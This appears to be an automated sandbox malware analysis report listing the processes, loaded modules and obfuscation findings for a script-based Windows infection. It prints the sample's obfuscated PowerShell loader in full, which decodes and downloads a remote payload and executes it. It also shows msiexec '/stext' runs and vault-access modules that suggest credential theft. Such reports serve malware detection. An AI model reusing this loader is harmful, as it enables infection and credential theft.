'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fxqlydinmzxw"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\prvvzwtgahpigxth"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ztjoaodiophnilhlqlz"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fxqlydinmzxw"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\prvvzwtgahpigxth"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ztjoaodiophnilhlqlz"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2440535401.0000000002E52000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2138518295.000002A57F901000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2141134873.000002A57FB01000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("powershell", ""echo $Alimentation; function Chirked($", "", "", "0");
              Source: Yara matchFile source: 00000004.00000002.2500400610.000000000C61A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2500148834.00000000088E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2473117058.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2295783227.0000020CEBC30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Marcionitic)$gLObaL:snacKS = [SyStEm.TExt.ENcoDiNG]::AsCIi.GetstRiNg($VuLGARiseredES)$GLOBaL:sOvEPUDenS=$SNaCKS.suBsTRing($joSInEs,$SEnSiBIliSErINgEnS)<#Hydrauliks Compleat Ryatpper
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Amylolysis $printfilsdfrdsvanskeliges $Keleps), (Kronregalierne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Urges = [AppDomain]::CurrentDomain.GetAssem
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Ddssygest52)), $Spattens).DefineDynamicModule($Phenakistoscope, $false).DefineType($Chicqued, $Badstue107, [System.MulticastDelegate])
